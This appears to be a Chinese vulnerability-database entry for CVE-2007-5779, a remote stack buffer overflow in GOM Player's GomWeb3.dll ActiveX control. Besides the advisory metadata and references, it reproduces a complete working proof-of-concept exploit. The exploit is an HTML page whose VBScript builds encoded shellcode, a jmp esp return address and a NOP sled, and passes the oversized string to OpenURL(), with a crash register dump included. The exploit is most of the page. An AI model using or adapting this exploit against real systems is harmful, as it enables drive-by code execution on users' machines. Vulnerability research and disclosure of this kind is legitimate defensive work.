Gretech GOM Player GomWeb3.dll远程栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113874 漏洞类型 缓冲区溢出
发布时间 2007-10-29 更新时间 2008-09-17
CVE编号 CVE-2007-5779 CNNVD-ID CNNVD-200711-001
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4579
https://www.securityfocus.com/bid/26236
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-001
|漏洞详情
GOMPlayer是在南韩广泛使用的媒体播放器。GOMPlayer所带的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。GOMPlayer所安装的GomWebCtrl.GomManager.1ActiveX控件(GomWeb3.dll)没有正确地处理OpenURL()方式,如果用户受骗访问了恶意站点并向该方式传送了超过500字节的超长参数的话,就可以触发栈溢出,导致执行任意指令。
|漏洞EXP
<!--
GOM Player 2.1.6.3499 GomWeb Control (GomWeb3.dll 1.0.0.12) remote buffer
overflow poc exploit (ie6/xp sp2)

quote from Wikipedia: "GOM Player(Gretech Online Movie Player) is South
Korea's most popular media player; as of July 2007, it had 8.4 million users,
compared to 5.4 million of Microsoft's Windows Media Player. Users most
commonly use the player to watch pornography..."
mphhh ...

passing more than 506 "A" to OpenUrl method:

EAX 00000000
ECX 7C80240F kernel32.7C80240F
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 00000000
ESP 0012CDD0 ASCII "AAAAAAAAAAAAAAAAAA...
EBP 0012DE08
ESI 003390B0
EDI 0000102A
EIP 41414141

object safety report:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
IPStorage Safe:  Safe for untrusted: caller,data

software site: http://www.gomplayer.com/main.html

rgod
site: http://retrogod.altervista.org
-->
<html>
<object classid='clsid:DC07C721-79E0-4BD4-A89F-C90871946A31' id='GomManager' /></object>
<script language='vbscript'>
//open calc.exe
scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
             unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
             unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
             unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
             unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
             unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
             unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
             unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
             unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
             unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
             unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
             unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
             unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
             unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
             unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
             unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
             unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
             unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
             unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
             unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
             unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
eip = unescape("%67%31%41%7e") 'jmp esp kernel32.dll
nop = String(48, unescape("%90"))
sURL=String(506, "A") + eip + nop + scode
GomManager.OpenURL sURL
</script>
</html>

# milw0rm.com [2007-10-29]
|受影响的产品
GRETECH CORP. GOM Player 2.1.6 3499
|参考资料

来源:XF
名称:gomplayer-gomwebctrl-bo(38159)
链接:http://xforce.iss.net/xforce/xfdb/38159
来源:BID
名称:26236
链接:http://www.securityfocus.com/bid/26236
来源:MILW0RM
名称:4579
链接:http://www.milw0rm.com/exploits/4579
来源:MISC
链接:http://www.gomplayer.com/forum/viewtopic.html?t=1013
来源:VUPEN
名称:ADV-2007-3634
链接:http://www.frsirt.com/english/advisories/2007/3634
来源:SECUNIA
名称:27418
链接:http://secunia.com/advisories/27418